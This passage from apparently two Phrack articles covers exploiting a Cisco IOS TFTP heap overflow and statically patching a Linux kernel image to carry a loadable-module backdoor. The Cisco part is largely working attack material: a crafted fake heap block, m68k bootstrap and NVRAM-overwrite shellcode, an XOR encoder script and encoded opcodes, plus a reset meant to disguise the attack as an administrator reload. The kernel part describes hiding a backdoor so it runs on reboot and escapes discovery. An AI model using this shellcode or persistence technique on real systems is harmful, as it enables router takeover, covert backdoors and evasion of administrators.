258F998   1032 258F914 258FDCC   1  *Init*     20E5108   Process Array
258FDCC   1000 258F998 25901E0   1  Load Meter 20E54BA   Process Stack
25901E0    488 258FDCC 25903F4   1  Load Meter 20E54CC   Process
25903F4    128 25901E0 25904A0   1  Load Meter 20DD1CE   Process Events

This "Process Array" can be displayed by the "show memory" command:

radio#show memory 0x258F998
0258F990:                   AB1234CD FFFFFFFE          +.4M...~
0258F9A0: 00000000 020E50B6 020E5108 0258FDCC  ......P6..Q..X}L
0258F9B0: 0258F928 80000206 00000001 020E1778  .Xy(...........x
0258F9C0: 00000000 00000028 02590208 025D74C0  .......(.Y...]t@
0258F9D0: 02596F3C 02598208 025A0A04 025A2F34  .Yo<.Y...Z...Z/4
0258F9E0: 025AC1FC 025BD554 025BE920 025BFD2C  .ZA|.[UT.[i .[},
0258F9F0: 025E6FF0 025E949C 025EA95C 025EC484  .^op.^...^)\.^D.
0258FA00: 025EF404 0262F628 026310DC 02632FD8  .^t..bv(.c.\.c/X
0258FA10: 02634350 02635634 0263F7A8 026418C0  .cCP.cV4.cw(.d.@
0258FA20: 026435FC 026475E0 025D7A38 026507E8  .d5|.du`.]z8.e.h
0258FA30: 026527DC 02652AF4 02657200 02657518  .e'\.e*t.er..eu.
0258FA40: 02657830 02657B48 02657E60 0269DCFC  .ex0.e{H.e~`.i\|
0258FA50: 0269EFE0 026A02C4 025DD870 00000000  .io`.j.D.]Xp....
0258FA60: 00000000 025C3358 026695EC 0266A370  .....\3X.f.l.f#p

While you also see the already discussed block header format in action now,
the interesting information starts at 0x0258F9C4. Here, you find the number
of processes currently running on IOS. They are ordered by their process
ID. What we are looking for is a process that gets executed every once in a
while. The reason for this is, if we modify something in the process data
structures, we don't want the process being active at this point in time,
so that the location we are overwriting is static. For this reason, yours
truly picked the "Load Meter" process, which is there to measure the system
load and is fired off about every 30 seconds. Let's get the PID of
"Load Meter":

radio#show processes cpu
CPU utilization for five seconds: 2%/0%; one minute: 3%; five minutes: 3%
 PID  Runtime(ms)  Invoked  uSecs    5Sec   1Min   5Min TTY Process
   1          80      1765     45   0.00%  0.00%  0.00%   0 Load Meter

Well, conveniently, this process has PID 1. Now, we check the memory
location the "Process Array" points to. Yours truly calls this memory
location "process record", since it seems to contain everything IOS needs
to know about the process. The first two entries in the record are:

radio#sh mem 0x02590208
02590200:                   0258FDF4 025901AC          .X}t.Y.,
02590210: 00001388 020E488E 00000000 00000000  ......H.........
02590220: 00000000 00000000 00000000 00000000  ................

The first entry in this record is 0x0258FDF4, which is the process stack.
You can compare this to the line above that says "Load Meter" and "Process
Stack" on it in the output of "show memory processor allocating-process".
The second element is the current stack pointer of this process
(0x025901AC). By now it should also be clear why we want to pick a process
with low activity. But surprisingly, the same procedure also works quite
well with busier processes such as "IP Input". Inspecting the location of
the stack pointer, we see something quite familiar:

radio#sh mem 0x025901AC
025901A0:                            025901C4              .Y.D
025901B0: 020DC478 0256CAF8 025902DE 00000000  ..Dx.VJx.Y.^....

This is classic C calling convention: first we find the former frame
pointer and then we find the return address. Therefore, 0x025901B0 is the
address we are targeting to overwrite with a pointer supplied by us.

The only question left is: Where do we want the return address to point to?
As already mentioned, IOS will overwrite the buffer we are filling with
0x0D0D0D0D when the free() is executed - so this is not a good place to
have your code in. On the other hand, the fake block's data section is
already considered clean from IOS's point of view, so we just append our
code to the fake block header we already have to send. But what's the
address of this? Well, since we have to know the previous pointer, we can
calculate the address of our code as offset to this one - and it turns out
that this is actually a static number in this case. There are other, more
advanced methods to deliver the code to the device, but let's keep focused.

The TFTP filename we are asking for should now have the form of:

 |              |
 |              |
 | CODE         |
 |              |

At this point, we can build the fake block using all the information we

    char                fakeblock[] =
        "\xFD\x01\x10\xDF"      // RED
        "\xAB\x12\x34\xCD"      // MAGIC
        "\xFF\xFF\xFF\xFF"      // PID
        "\x80\x81\x82\x83"      //
        "\x08\x0C\xBB\x76"      // NAME
        "\x80\x8a\x8b\x8c"      //

        "\x02\x0F\x2A\x04"      // NEXT
        "\x02\x0F\x16\x94"      // PREV

        "\x7F\xFF\xFF\xFF"      // SIZE
        "\x01\x01\x01\x01"      //
        "\xA0\xA0\xA0\xA0"      // padding
        "\xDE\xAD\xBE\xEF"      // MAGIC2
        "\x8A\x8B\x8C\x8D"      //
        "\xFF\xFF\xFF\xFF"      // padding
        "\xFF\xFF\xFF\xFF"      // padding

        "\x02\x0F\x2A\x24"      // FREE NEXT (in BUFFER)
        "\x02\x59\x01\xB0"      // FREE PREV (Load Meter return addr)

When sending this to the Cisco, you are likely to see something like this:

illegal instruction interrupt
program counter = 0x20f2a24
status register = 0x2700
vbr at time of exception = 0x4000000

depending on what comes after your fake block header. Of course, we did not
provide code for execution yet. But at this point in time, we got the CPU
redirected into our buffer.

--[ 5 - Writing (shell)code for Cisco

Before one can write code for the Cisco platform, you have to decide on the
general processor architecture you are attacking. For the purpose of this
paper, we will focus on the lower range devices running on Motorola 68k

Now the question is, what do you want to do with your code on the system.
Classic shell code design for commonly used operating system platforms uses
syscalls or library functions to perform some port binding and provide
shell access to the attacker. The problem with Cisco IOS is, that we will
have a hard time keeping it alive after we performed our pointer games.
This is because in contrast to "normal" daemons, we destroyed the memory
management of the operating system core and we can not expect it to cope
with the mess we left for it.

Additionally, the design of IOS does not feature transparent syscalls as
far as yours truly knows. Because of its monolithic design, things are
linked together at build time. There might be ways to call different
subfunctions of IOS even after a heap overflow attack, but it appears to
be an inefficient route to take for exploitation and would make the whole
process even more unstable.

The other way is to change the router's configuration and reboot it, so it
will come up with the new config, which you provided. This is far
simpler than trying to figure out syscalls or call stack setups. The idea
behind this approach is that you don't need any IOS functionality anymore.
Because of this, you don't have to figure out addresses and other vital
information about the IOS. All you have to know is which NVRAM chips are
used in the box and where they are mapped. This might sound way more
complicated than identifying functions in an IOS image - but is not. In
contrast to common operating systems on PC platforms, where the number of
possible hardware combinations and memory mappings by far exceeds a
feasible mapping range, it's the other way around for Cisco routers. You
can have more than ten different IOS images on a single platform - and this
is only one branch - but you always have the same general memory layout and
the ICs don't change for the most part. The only thing that may differ
between two boxes are the modules and the size of available memory (RAM,
NVRAM and Flash), but this is not of big concern for us.

The non-volatile random access memory (NVRAM) stores the configuration of a
Cisco router in most cases. The configuration itself is stored in plain
text as one continuous C-style string or text file and is terminated by the
keyword 'end' and one or more 0x00 bytes. A header structure contains
information like the IOS version that created this configuration, the size
of it and a checksum. If we replace the config on the NVRAM with our own
and calculate the numbers for the header structure correctly, the router
will use our IP addresses, routings, access lists and (most important)
passwords next time it reloads.

As one can see on the memory maps [2], there are one (in the worst case
two) possible memory addresses for the NVRAM for each platform. Since
the NVRAM is mapped into the memory just like most memory chips are, we
can access it with simple memory move operations. Therefore, the only thing
we need for our "shell" code is the CPU (M68k), its address and data bus
and the cooperation of the NVRAM chip.

There are things to keep in mind about NVRAM. First of all, it's slow to
write to. The Xicor chips yours truly encountered on Cisco routers require
that after a write, the address lines are kept unchanged for the time the
chip needs to write the data. A control register will signal when the write
operation is done. Since the location of this control register is not known
and might not be the same for different types of the same platform, yours
truly prefers to use delay loops to give the chip time to write the data -
since speed is not the attacker's problem here.

Now that we know pretty much what we want to do, we can go on and look at
the "how" part of things. First of all, you need to produce assembly for
the target platform. A little known fact is that IOS is actually built (at
least sometimes) using GNU compilers. Therefore, the binutils [3] package
can be compiled to build Cisco compatible code by setting the target
platform for the ./configure run to --target=m68k-aout. When you are done,
you will have a m68k-aout-as binary, which can produce your code and a
m68k-aout-objdump to get the OP code values.

In case the reader is fluent in Motorola 68000 assembly, I would like to
apologize for the bad style, but yours truly grew up on Intel.
Optimizations and style guides are welcome. Anyway, let's start coding.

For a string overflow scenario like this one, the recommended way for small
code is to use self-modification. The main code will be XOR'd with a
pattern like 0x55 or 0xD5 to make sure that no 0x00 bytes show up. A
bootstrap code will decode the main code and pass execution on to it. The
Cisco 1600 platform with its 68360 does not have any caching issues to
worry us (thanks to LSD for pointing this out), so the only issue we have
is avoiding 0x00 bytes in the bootstrap code. Here is how it works:

--- bootstrap.s ---
	.globl _start
        | Remove write protection for NVRAM.
	| Protection is Bit 1 in BR7 for 0x0E000000
        move.l  #0x0FF010C2,%a1
        lsr     (%a1)

        | fix the branch opcode
	| 'bne decode_loop' is OP code 0x6600 and this is bad
        lea     broken_branch+0x101(%pc),%a3
        sub.a   #0x0101,%a3
        lsr     (%a3)

        | perform dummy load, where 0x01010101 is then replaced
        | by our stack ptr value due to the other side of the pointer
	| exchange
        move.l  #0x01010101,%d1

        | get address of the real code appended plus 0x0101 to
	| prevent 0x00 bytes
        lea     xor_code+0x0101(%pc),%a2
        sub.a   #0x0101,%a2
        | prepare the decode register (XOR pattern)
        move.w  #0xD5D5,%d1

	| Decode our main payload code and the config
        eor.w   %d1,(%a2)+
	| check for the termination flag (greetings to Bine)
        cmpi.l  #0xCAFEF00D,(%a2)
        | this used to be 'bne decode_loop' or 0x6600FFF6
        .byte   0xCC,0x01,0xFF,0xF6


--- end bootstrap.s ---

You may assemble the code into an object file using:
linux# m68k-aout-as -m68360 -pic --pcrel -o bootstrap.o bootstrap.s

There are a few things to say about the code. Number one are the first two
instructions. The CPU we are dealing with supports write protection for
memory segments [4]. Information about the memory segments is stored in
so-called "Base Registers", BR0 to BR7. These are mapped into memory at
0x0FF00000 and later. The one we are interested in (BR7) is at 0x0FF010C2.
Bit0 tells the CPU if this memory is valid and Bit1 if it's write
protected, so the only thing we need to do is to shift the lower byte one
Bit to the right. The write protection Bit is cleared and the valid Bit is
still in place.

The second thing of mild interest is the broken branch code, but the
explanation in the source should make this clear: the OP code of "BNE"
unfortunately is 0x6600. So we shift the whole first word one to the right
and when the code runs, this is corrected.

The third thing is the dummy move to d1. If the reader would refer back to
the place we discussed the pointer exchange, he will notice that there is a
"back" part in this operation: namely the stack address is written to our
code plus 20 bytes (or 0x14). So we use a move operation that translates to
the OP code of 0x223c01010101, located at offset 0x12 in our code. After
the pointer exchange takes place, the 0x01010101 part is replaced by the
pointer - which is then innocently moved to the d1 register and ignored.

When this code has completed execution, the appended XOR'd code and config
should be in memory in all clear text/code. The only thing we have to do
now is copy the config in the NVRAM. Here is the appropriate code to do

--- config_copy.s ---
        .globl  _start

	| turn off interrupts
        move.w	#0x2700,%sr;
	move.l	#0x0FF010C2,%a1
	move.w	#0x0001,(%a1)

	| Get position of appended config and write it with delay
	lea	config(%pc),%a2
	move.l	#0x0E0002AE,%a1
	move.l	#0x00000001,%d2

	move.b	(%a2)+,(%a1)+
	| delay loop
	move.l	#0x0000FFFF,%d1
	  subx	%d2,%d1
	  bmi	write_delay
	cmp.l	#0xCAFEF00D,(%a2)
	bne	copy_confg

	| delete old config to prevent checksum errors
	move.w	#0x0000,(%a1)+
	move.l	#0x0000FFFF,%d1
	| delay loop
	  subx	%d2,%d1
	  bmi	write_delay2
	cmp.l	#0x0E002000,%a1
	blt	delete_confg

	|  perform HARD RESET
        move.w	#0x2700,%sr
        moveal	#0x0FF00000,%a0
        moveal	(%a0),%sp
        moveal	#0x0FF00004,%a0
        moveal	(%a0),%a0
        jmp	(%a0)

--- end config_copy.s ---

There is no particular magic about this part of the code. The only thing
worth noticing is the final CPU reset. There is a reason why we do this. If
we just crash the router, there might be exception handlers in place to
save the call stack and other stuff to the NVRAM. This might change
checksums in an unpredictable way and we don't want to do this. The other
reason is, that a clean reset makes the router look like it was rebooted by
an administrator using the "reload" command. So we don't raise any
questions despite the completely changed configuration ;-)

The config_copy code and the config itself must now be XOR encoded with the
pattern we used in the bootstrap code. Also, you may want to put the code
into a nice char array for easy use in a C program. For this, yours truly
uses a dead simple but efficient Perl script:

--- ---


while (<STDIN>) {
    if (/[0-9a-f]+:\t/) {
	$hexcode=~s/ //g;
	$hexcode=~s/([0-9a-f]{2})/$1 /g;


	@bytes=split(/ /,$hexcode);
	foreach (@bytes) {
		$_=$_^$pattern if($pattern);
	print "\t\"".$hexcode."\"".$tabs."//".$mnemonic." (0x".$alc.")\n";
--- end ---

You can use the output of objdump and pipe it into the script. If the
script gets no parameter, it will produce the C char string without
modifications. The first optional parameter will be your XOR pattern and the
second one can be the address your buffer is going to reside at. This makes
debugging the code a hell of a lot easier, because you can refer to the
comment at the end of your C char string to find out which command made the
Cisco unhappy.

The output for our little config_copy.s code XOR'd with 0xD5 looks like
this (trimmed for phrack):

linux# m68k-aout-objdump -d config_copy.o |
> ./ 0xD5 0x020F2A24

"\x93\x29\xF2\xD5"              //movew #9984,%sr (0x020F2A24)
"\xF7\xA9\xDA\x25\xC5\x17"      //moveal #267391170,%a1 (0x020F2A28)
"\xE7\x69\xD5\xD4"              //movew #1,%a1@ (0x020F2A2E)
"\x90\x2F\xD5\x87"              //lea %pc@(62 <config>),%a2 (0x020F2A32)
"\xF7\xA9\xDB\xD5\xD7\x7B"      //moveal #234881710,%a1 (0x020F2A36)
"\xA1\xD4"                      //moveq #1,%d2 (0x020F2A3C)
"\xC7\x0F"                      //moveb %a2@+,%a1@+ (0x020F2A3E)
"\xF7\xE9\xD5\xD5\x2A\x2A"      //movel #65535,%d1 (0x020F2A40)
"\x46\x97"                      //subxw %d2,%d1 (0x020F2A46)
"\xBE\xD5\x2A\x29"              //bmiw 22 <write_delay> (0x020F2A48)
"\xD9\x47\x1F\x2B\x25\xD8"      //cmpil #-889262067,%a2@ (0x020F2A4C)
"\xB3\xD5\x2A\x3F"              //bnew 1a <copy_confg> (0x020F2A52)
"\xE7\x29\xD5\xD5"              //movew #0,%a1@+ (0x020F2A56)
"\xF7\xE9\xD5\xD5\x2A\x2A"      //movel #65535,%d1 (0x020F2A5A)
"\x46\x97"                      //subxw %d2,%d1 (0x020F2A60)
"\xBE\xD5\x2A\x29"              //bmiw 3c <write_delay2> (0x020F2A62)
"\x66\x29\xDB\xD5\xF5\xD5"      //cmpal #234889216,%a1 (0x020F2A66)
"\xB8\xD5\x2A\x3D"              //bltw 32 <delete_confg> (0x020F2A6C)
"\x93\x29\xF2\xD5"              //movew #9984,%sr (0x020F2A70)
"\xF5\xA9\xDA\x25\xD5\xD5"      //moveal #267386880,%a0 (0x020F2A74)
"\xFB\x85"                      //moveal %a0@,%sp (0x020F2A7A)
"\xF5\xA9\xDA\x25\xD5\xD1"      //moveal #267386884,%a0 (0x020F2A7C)
"\xF5\x85"                      //moveal %a0@,%a0 (0x020F2A82)
"\x9B\x05"                      //jmp %a0@ (0x020F2A84)

Finally, there is only one more thing to do before we can compile this all
together: we have to create the new NVRAM header and calculate the
checksum for our new config. The NVRAM header has the form of:

typedef struct {
    u_int16_t       magic;  	// 0xABCD
    u_int16_t       one;	// Probably type (1=ASCII, 2=gz)
    u_int16_t       checksum;
    u_int16_t       IOSver;
    u_int32_t       unknown;	// 0x00000014
    u_int32_t       cfg_end;	// pointer to first free byte in
				// memory after config
    u_int32_t       size;
} nvhdr_t;

Obviously, most values in here are self-explanatory. This header is not
nearly as thoroughly tested as the memory structures, so IOS will forgive
you strange values in the cfg_end entry and such. You can choose the IOS
version, but yours truly recommends to use something along the lines of
0x0B03 (11.3), just to make sure it works. The size field covers only the
real config text - not the header.
The checksum is calculated over the whole thing (header plus config) with
the checksum field itself being set to zero. This is a standard one's
complement checksum as you find in any IP implementation.
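
For checking a captured NVRAM dump against the header layout and checksum rule just described, the following C code is an added example, not the author's or Cisco's: the function names, the packed big-endian 20-byte layout, the zero padding of an odd trailing byte and the sample image are assumptions made here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NV_MAGIC    0xABCDu
#define NV_HDR_LEN  20u   /* 4 x u16 + 3 x u32; assumed packed and big-endian */
#define NV_CSUM_OFF 4u    /* byte offset of the checksum field */

struct nvhdr {            /* decoded copy of the header fields */
    uint16_t magic, one, checksum, iosver;
    uint32_t unknown, cfg_end, size;
};

static uint16_t be16(const uint8_t *p) { return (uint16_t)(p[0] << 8 | p[1]); }
static uint32_t be32(const uint8_t *p) { return (uint32_t)be16(p) << 16 | be16(p + 2); }

/* One's complement checksum over n bytes, 16 bits at a time. The word at
   byte offset zero_off counts as zero; pass SIZE_MAX to count every word.
   An odd trailing byte is padded with zero (assumption). */
uint16_t ones_checksum(const uint8_t *p, size_t n, size_t zero_off)
{
    uint64_t sum = 0;
    for (size_t i = 0; i < n; i += 2) {
        uint16_t w = (uint16_t)(p[i] << 8 | (i + 1 < n ? p[i + 1] : 0));
        if (i != zero_off) sum += w;
    }
    while (sum >> 16) sum = (sum & 0xFFFF) + (sum >> 16);   /* fold the carries */
    return (uint16_t)~sum;
}

/* Returns 0 if the image is consistent, -1 if it is truncated or has a bad
   magic or size field, -2 if the stored checksum does not match the data. */
int nv_verify(const uint8_t *img, size_t len, struct nvhdr *out)
{
    if (len < NV_HDR_LEN || be16(img) != NV_MAGIC) return -1;
    out->magic    = be16(img);
    out->one      = be16(img + 2);
    out->checksum = be16(img + 4);
    out->iosver   = be16(img + 6);
    out->unknown  = be32(img + 8);
    out->cfg_end  = be32(img + 12);
    out->size     = be32(img + 16);
    if (out->size > len - NV_HDR_LEN) return -1;   /* size covers the text only */
    if (ones_checksum(img, NV_HDR_LEN + out->size, NV_CSUM_OFF) != out->checksum)
        return -2;
    return 0;
}

/* Constructed sample image: header followed by "hostname lab\nend\n". */
static const uint8_t nv_sample[37] = {
    0xAB,0xCD, 0x00,0x01, 0x8C,0xC6, 0x0B,0x03,   /* magic, one, checksum, IOSver */
    0x00,0x00,0x00,0x14, 0x00,0x00,0x00,0x00,     /* unknown, cfg_end (constructed) */
    0x00,0x00,0x00,0x11,                          /* size = 17 bytes of text */
    'h','o','s','t','n','a','m','e',' ','l','a','b','\n','e','n','d','\n'
};

int main(void)
{
    struct nvhdr h;
    uint8_t copy[sizeof nv_sample];
    int rc = nv_verify(nv_sample, sizeof nv_sample, &h);
    printf("sample: %d, IOSver 0x%04X, %u text bytes\n", rc, h.iosver, (unsigned)h.size);
    memcpy(copy, nv_sample, sizeof copy);
    copy[NV_HDR_LEN + 9] ^= 0x01;                 /* one changed character */
    printf("modified copy: %d\n", nv_verify(copy, sizeof copy, &h));
    return 0;
}
```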

When putting it all together, you should have something along the lines of:

 |              |
 | Bootstrap    |
 |              |
 | config_copy  |
 |   XOR pat    |
 | NVRAM header |
 | + config     |
 |   XOR pat    |

...which you can now send to the Cisco router for execution. If everything
works the way it is planned, the router will seemingly freeze for some
time, because it's working the slow loops for NVRAM copy and does not allow
interrupts, and should then reboot clean and nice.

To save space for better papers, the full code is not included here but is
available at . It
supports some adjustments for code offset, NOPs where needed and a slightly
different fake block for 11.1 series IOS.

--[ 6 - Everything not covered in 1-5

A few assorted remarks that somehow did not fit into the rest of this text
should be made, so they are made here.

First of all, if you find or know an overflow vulnerability for IOS 11.x
and you think that it is not worth all the trouble to exploit since
everyone should run 12.x by now, let me challenge this. Nobody with some
experience on Cisco IOS will run the latest version. It just doesn't work
correctly. Additionally, many people don't update their routers anyway. But
the most interesting part is a thing called "Helper Image" or simply "boot
IOS". This is a mini-IOS loaded right after the ROM monitor, which is
normally a 11.x. On the smaller routers, it's a ROM image and can not be
updated easily. For the bigger ones, people assured me that there are no
12.x mini-IOSes out there they would put on a major production router. Now,
when the Cisco boots up and starts the mini-IOS, it will read the config and
work accordingly as long as the feature is supported. Many are - including
the TFTP server. This gives an attacker a 3-8 seconds time window in which
he can perform an overflow on the IOS, in case someone reloads the router.
In case this goes wrong, the full-blown IOS still starts up, so there will
be no traces of any hostile activity.

The second item yours truly would like to point out are the different
things one might want to explore for overflow attacks. The obvious one
(used in this paper as example) is a service running on a Cisco router.
Another point for overflowing stuff are protocols. No protocol inspection
engine is perfect AFAYTK. So even if the IOS is just supposed to route
the packet, but has to inspect the contents for some reason, you might find
something there. And if all fails, there are still the debug based
overflows. IOS offers a vast amount of debug commands for next to
everything. These do normally display a lot of information coming right
from the packet they received and don't always check the buffer they use
for compiling the displayed string. Unfortunately, it requires someone to
turn on debugging in the first place - but well, this might happen.

And finally, some greets have to be in here. Those go to the following
people in no particular order: Gaus of Cisco PSIRT, Nico of,
Dan of, Halvar Flake, the three anonymous CCIEs/Cisco wizards
yours truly keeps asking strange questions and of course FtR and Mr. V.H.,
because without their equipment, there wouldn't be any research to speak
of. Additional greets go to all people who research Cisco stuff and with
whom yours truly has had no chance to talk so far - please get in touch with us.
The last one goes to the vulnerability research labs out there: let me
know if you need any help reproducing this `;-7

--[ A - References

[1] anonymous
    "Once upon a free()..."
    Phrack Magazine, Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12

[2] Cisco Router IOS Memory Maps

[3] GNU binutils

[4] Motorola QUICC 68360 CPU Manual
    MC68360UM, Page 6-70

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x08 of 0x10

|=-------------------=[ Static Kernel Patching ]=------------------------=|
|=-----------------=[ jbtzhm <[email protected]> ]=---------------------=|
|=---------------------[ ]=-----------------------=|

--[ Contents

  1 - Introduction

  2 - Get kernel from the image

  3 - Allocate some space in image

  4 - Relocate the symbol in module file

  5 - Make it autorun when reboot

  6 - Possible solutions

  7 - Conclusion

  8 - References

  9 - Appendix: The implementation

--[ 1 - Introduction

This paper will show a simple way to patch a common LKM into the
static Linux kernel image. Most kernel backdoors are implemented as loadable
kernel modules, which are loaded into the kernel by insmod or /dev/kmem, and
the backdoor module can be found easily if the disk can be mounted on other
machines. That is not the expected result. What is wanted is just a
method to put the LKM into the kernel image and make it run on reboot.

The program attached in the appendix was coded and debugged on a default
Red Hat 7.2 (Intel) installation, and can easily be tested on other kernel
versions with some modification. The program also relies on the
/boot/ file which contains the kernel symbol addresses. If the file
doesn't exist on your system, more work has to be done to make it run.

--[ 2 - Get kernel from the image

The first step is getting the kernel from the image file, which is usually
compressed (an uncompressed image is not considered here because it is much
easier). The image file can be analyzed from the kernel source files, and the
Makefile will clarify the structure of the image.


zImage: $(CONFIGURE) bootsect setup compressed/vmlinux tools/build
        $(OBJCOPY) compressed/vmlinux compressed/vmlinux.out
        tools/build bootsect setup compressed/vmlinux.out $(ROOT_DEV) >
(bzImage is similar)

bootsect: bootsect.o
        $(LD) -Ttext 0x0 -s --oformat binary -o $@ $<

bootsect.o: bootsect.s
        $(AS) -o $@ $<

bootsect.s: bootsect.S Makefile $(BOOT_INCL)
        $(CPP) $(CPPFLAGS) -traditional $(SVGA_MODE) $(RAMDISK) \
$< -o $@

setup: setup.o
        $(LD) -Ttext 0x0 -s --oformat binary -e begtext -o $@ $<

setup.o: setup.s
        $(AS) -o $@ $<

setup.s: setup.S video.S Makefile $(BOOT_INCL) $(TOPDIR)\
/include/linux/version.h $(TOPDIR)/include/linux/compile.h
        $(CPP) $(CPPFLAGS) -D__ASSEMBLY__ -traditional \
$(SVGA_MODE) $(RAMDISK) $< -o $@

The bootsect and setup files are easy to understand. They are built from
bootsect.s and setup.s respectively. The vmlinux.out file is a raw binary
file generated by the objcopy command. The value of $(OBJCOPY) is
"objcopy -O binary -R .note -R .comment -S"; more details are available
from `man objcopy`. When the three files are ready, the build program
binds them into one file, which is the kernel image file.
The vmlinux file, however, is generated in a more complicated way. Go into
the compressed directory and look through its Makefile.

vmlinux: piggy.o $(OBJECTS)
        $(LD) $(ZLINKFLAGS) -o vmlinux $(OBJECTS) piggy.o

$(OBJECTS) includes head.o and misc.o, compiled from head.S and misc.c
respectively. The most important step in head.S is the call to the
decompress_kernel function in misc.c, which inflates the compressed
kernel. decompress_kernel requires the input_len and input_data symbols,
which are defined in piggy.o.

piggy.o:        $(SYSTEM)
        tmppiggy=_tmp_$$$$piggy; \
        rm -f $$tmppiggy $$tmppiggy.gz $$tmppiggy.lnk; \
        $(OBJCOPY) $(SYSTEM) $$tmppiggy; \
        gzip -f -9 < $$tmppiggy > $$tmppiggy.gz; \
        echo "SECTIONS { .data : { input_len = .; \
        LONG(input_data_end - input_data) input_data = .; \
        *(.data) input_data_end = .; }}" > $$tmppiggy.lnk;
        $(LD) -r -o piggy.o -b binary $$tmppiggy.gz -b elf32-i386 -T \
        rm -f $$tmppiggy $$tmppiggy.gz $$tmppiggy.lnk

The piggy.o file is an ordinary ELF object file, but it contains only a
data section. ld is given a command file like this:

SECTIONS { .data : { input_len = .; LONG(input_data_end - input_data)\
input_data = .; *(.data) input_data_end = .; }}

The command file gives piggy.o the symbols required by misc.o. The
command "gzip -f -9" can also be seen in the rule: it simply compresses
the kernel binary built from thousands of kernel source files.

So the kernel image could be described like this

Now let us understand more about the boot process.
The process can be separated into the following logical stages:
1. BIOS selects the boot device.
2. BIOS loads [bootsect] from the boot device.
3. [bootsect] loads [setup] and [[head][misc][compressed_kernel]].
4. [setup] does some setup work and jumps to [head] (which is at 0x1000
   or 0x100000).
5. [head] calls decompress_kernel in [misc].
6. [misc] uncompresses [compressed_kernel] and puts it at 0x100000.
7. High-level init (begins at startup_32 in
   linux/arch/i386/kernel/head.S).

After the machine reaches step 7, the high-level initialization begins.

Once the structure of the kernel image is clear, the kernel text can be
pulled out of the compressed image with a dirty method: matching the
compress magic contained in the image. It is also known that the 4-byte
number before the magic is the input_data, from which the offset can be
verified. After this, gunzipping the kernel is pretty easy.

--[ 3 - Allocate some space in image to use

Allocation here doesn't mean the vmalloc or kmalloc methods. It just means
that space is required to hold the LKM file. The LKM file can easily be
appended to the kernel with cat (lkm file >> the kernel), but that will
not work. To find the reason, the best method is to go back into the
kernel initialization code, which is all in step 7 mentioned

/*
 * Clear BSS first so that there are no surprises...
 */
        xorl %eax,%eax
        movl $ SYMBOL_NAME(__bss_start),%edi
        movl $ SYMBOL_NAME(_end),%ecx
        subl %edi,%ecx
        rep
        stosb

After reading the head.S file, the above code can be found; it clearly
shows that the BSS range is cleared. The BSS area holds uninitialized
variables, which are not included in the kernel file, but kernel memory
reserves that area for the BSS. So the LKM would be wiped if the code were
simply appended to the kernel. To solve the problem, dummy data whose
length is exactly the BSS size can be added before the code. Though this
makes the new kernel much larger, compression deflates all the zero data
effectively.

However, there is another problem. Read through the following code:

void __init setup_arch(char **cmdline_p)   /* called by start_kernel */
        ...
        /*
         * partially used pages are not usable - thus
         * we are rounding upwards:
         */
        start_pfn = PFN_UP(__pa(&_end));
        ...
        init_mm.start_code = (unsigned long) &_text;
        init_mm.end_code = (unsigned long) &_etext;
        init_mm.end_data = (unsigned long) &_edata;
        init_mm.brk = (unsigned long) &_end;    /* it is bss end */

The kernel has no reason to leave any space for the LKM, so it manages the
memory available from the BSS end, which is exactly where the LKM code
begins. Therefore, the _end symbol in the text should be modified to give
start_pfn a larger value. The new kernel will then look like this:

[modified kernel][all zero dummy][module]

--[ 4 - Relocate the symbol in module file

The module is a common LKM file, usually an ELF object file, and an object
file needs to be relocated before it can be used. The following example
makes this easier to understand.

int init_module()
{
        char s[] = "hello world\n";
        printk("%s", s);
        return 0;
}

After compiling the program with gcc, module.o is available:

[[email protected] test]#gcc -O2 -c module.c

[[email protected] test]# objdump -x module.o|more
OFFSET   TYPE              VALUE
00000004 R_386_32          .rodata
00000009 R_386_32          .rodata
0000000e R_386_PC32        printk

[[email protected] test]# objdump -d module.o

test.o:     file format elf32-i386

Disassembly of section .text:

00000000 <init_module>:
   0:   55                      push   %ebp
   1:   89 e5                   mov    %esp,%ebp
   3:   68 00 00 00 00          push   $0x0
   8:   68 0d 00 00 00          push   $0xd
   d:   e8 fc ff ff ff          call   e <init_module+0xe>
  12:   31 c0                   xor    %eax,%eax
  14:   c9                      leave
  15:   c3                      ret

The object file structure is clear from the objdump output. There are
three entries in the text relocation section, and each offset shows the
place that must be corrected. For the printk symbol, the type is
R_386_PC32, which means a relative call instruction (R_386_32 means an
absolute address). So after relocation, the value "fc ff ff ff" in the
text that calls printk will be replaced with the right value.

Relocation is, however, more complex than can be described here; more
information is available in the ELF specification. Silvio wrote a lot of
relocation code in his paper "RUNTIME KERNEL KMEM PATCHING". Many lines
are borrowed from it, and some handling is added for uninitialized static
and SHN_COMMON variables.
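
The arithmetic behind the three relocation entries above, as an added example (not code from the article or from Silvio's paper). The bytes and offsets are the ones in the objdump output; the load addresses and the printk address are constructed values chosen only for illustration. The same formula run backwards (call_target) is what an analyst uses to see where a relocated call found in a binary actually lands.

```python
import struct

R_386_32, R_386_PC32 = 1, 2      # relocation type numbers from the i386 ELF ABI

# .text of module.o exactly as shown in the objdump -d listing above.
TEXT = bytes.fromhex("5589e5" "6800000000" "680d000000" "e8fcffffff"
                     "31c0" "c9" "c3")

# (offset, type, symbol) rows from the objdump -x relocation table above.
RELOCS = [(0x04, R_386_32, ".rodata"),
          (0x09, R_386_32, ".rodata"),
          (0x0E, R_386_PC32, "printk")]

# Constructed addresses (assumptions, not taken from any real System.map).
TEXT_BASE = 0xC0300000
SYMBOLS = {".rodata": 0xC0300020, "printk": 0xC0115D90}


def relocate(text, relocs, symbols, text_base):
    """Apply i386 REL relocations: the addend A is the word already stored
    at the patch site, S is the symbol address, P is the patch address."""
    out = bytearray(text)
    for offset, rtype, name in relocs:
        if offset + 4 > len(out):
            raise ValueError("relocation at 0x%x is outside .text" % offset)
        (addend,) = struct.unpack_from("<i", out, offset)
        s, p = symbols[name], text_base + offset
        if rtype == R_386_32:
            value = s + addend               # absolute: S + A
        elif rtype == R_386_PC32:
            value = s + addend - p           # pc-relative: S + A - P
        else:
            raise ValueError("unhandled relocation type %d" % rtype)
        struct.pack_into("<I", out, offset, value & 0xFFFFFFFF)
    return bytes(out)


def call_target(code, offset, text_base):
    """Decode the 'call rel32' at offset back to an absolute address."""
    if code[offset] != 0xE8:
        raise ValueError("no call opcode at 0x%x" % offset)
    (disp,) = struct.unpack_from("<i", code, offset + 1)
    return (text_base + offset + 5 + disp) & 0xFFFFFFFF


if __name__ == "__main__":
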